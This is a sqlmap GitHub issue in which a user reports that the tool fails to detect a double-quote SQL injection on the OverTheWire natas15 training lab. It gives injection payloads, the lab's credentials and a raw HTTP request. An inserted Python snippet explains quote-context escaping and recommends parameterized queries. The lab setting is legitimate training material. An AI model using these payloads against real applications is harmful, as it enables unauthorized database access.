sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Unable to detect SQLi when code uses double quotes #4397

Closed ghost closed 3 years ago

ghost commented 3 years ago

**Describe the bug**
Does sqlmap have the ability to exploit sqli vulnerabilities using " instead of '?

For example, I know there is a mysql sqli vulnerability at http://natas15.natas.labs.overthewire.org/index.php (this is a pen testing lab/training site specifically for trying to find and exploit vulnerabilities) using:

" union SELECT sleep(1000000), "a

but when I try to use sqlmap to speed up exploitation/exfiltration, sqlmap doesn't see the sqli vuln.

If sqlmap already does this, then any idea why the tool doesn't spot the sqli at that location when I know it's there? Anyway, if sqlmap isn't trying " in its injection attempts, possibly make that an option, like --quote-type where the default is '.

**To Reproduce**

  1. Browse to http://natas15.natas.labs.overthewire.org/index.php
  2. Username is natas15, Password is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
  3. For username here, enter: " or "a" = "a
  4. Click "check existence" button
  5. Go back
  6. For username, now enter: " union SELECT sleep(1000000), "a
  7. Clearly exploitable
  8. Either put the below into request.txt or, using Burp or some other tool, grab the request and create a request.txt file

    POST /index.php HTTP/1.1
    Host: natas15.natas.labs.overthewire.org
    User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 22
    Origin: http://natas15.natas.labs.overthewire.org
    DNT: 1
    Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==
    Connection: close
    Referer: http://natas15.natas.labs.overthewire.org/index.php
    Upgrade-Insecure-Requests: 1

    username=put+sqli+here

  9. Run sqlmap -r request.txt -p username

**Expected behavior**
I expect sqlmap to identify this sqli

**Running environment:**
* Installation method: git clone
* Client OS: fedora 31
* Program version (sqlmap --version): 1.4.7.12#dev
* Target DBMS: mysql
* Detected WAF/IDS/IPS protection: unknown - but I was able to execute timebased sqli scripted to get what I needed, so I don't think there's a waf blocking
* SQLi techniques found by sqlmap: none - sqlmap did not identify any sqli vulns

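As an added illustration of the quoting point this issue turns on (not sqlmap code, and not part of the issue), a small MySQL-style string lexer that reports whether a value spliced into a query stays inside its string literal, so the page's payloads can be compared against a double-quoted and a single-quoted query shape. The two query templates are assumptions, since the natas15 source is not shown here; on the application side the fix is the same for both: parameterized queries, which never splice the value into SQL text.

```python
# Quote-context check for a value spliced into SQL (MySQL rules, ANSI_QUOTES
# off): ' and " both delimit strings, backslash escapes the next character,
# and a doubled delimiter is a literal quote. Query shapes below are assumed.
MARK = "@@VALUE@@"

def value_context(template: str, value: str) -> str:
    """Report where value ends up after splicing it into template.

    'inside'       every character of value lies within one string literal
    'breaks_out'   part of value is lexed as SQL outside any literal
    'unterminated' the spliced query leaves a string literal open
    """
    start = template.index(MARK)
    sql = template.replace(MARK, value, 1)
    end = start + len(value)
    inside = [False] * len(sql)   # inside[i]: is sql[i] part of a literal?
    quote = None                   # active delimiter, or None outside strings
    i = 0
    while i < len(sql):
        c = sql[i]
        if quote is None:
            if c in "'\"":
                quote, inside[i] = c, True
            i += 1
            continue
        inside[i] = True
        if c == "\\" and i + 1 < len(sql):                 # backslash escape
            inside[i + 1] = True
            i += 2
        elif c == quote and sql[i + 1:i + 2] == quote:      # doubled delimiter
            inside[i + 1] = True
            i += 2
        else:
            if c == quote:                                  # closing delimiter
                quote = None
            i += 1
    if quote is not None:
        return "unterminated"
    return "inside" if all(inside[start:end]) else "breaks_out"

# Assumed query shapes (constructed): double-quoted as the issue describes, single-quoted for contrast.
DOUBLE_QUOTED = 'SELECT * FROM users WHERE username="@@VALUE@@"'
SINGLE_QUOTED = "SELECT * FROM users WHERE username='@@VALUE@@'"

if __name__ == "__main__":
    for payload in ('" or "a" = "a', "' or 'a'='a", "natas15"):
        print(repr(payload), value_context(DOUBLE_QUOTED, payload),
              value_context(SINGLE_QUOTED, payload))
```

The same value is harmless in one template and escapes the literal in the other, which is the whole difference between the two quote styles; a lexer like this is useful for reviewing why one test value succeeds where another fails, not as a substitute for parameterization.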
stamparm commented 3 years ago

Clearly exploitable <- give me a break. This issue does not have anything to do with "Unable to detect SQLi when code uses double quotes". Your payload is "clearly" not standard/common " union SELECT sleep(1000000), "a

stamparm commented 3 years ago

Closed this down because clearly there is no issue with the sqlmap here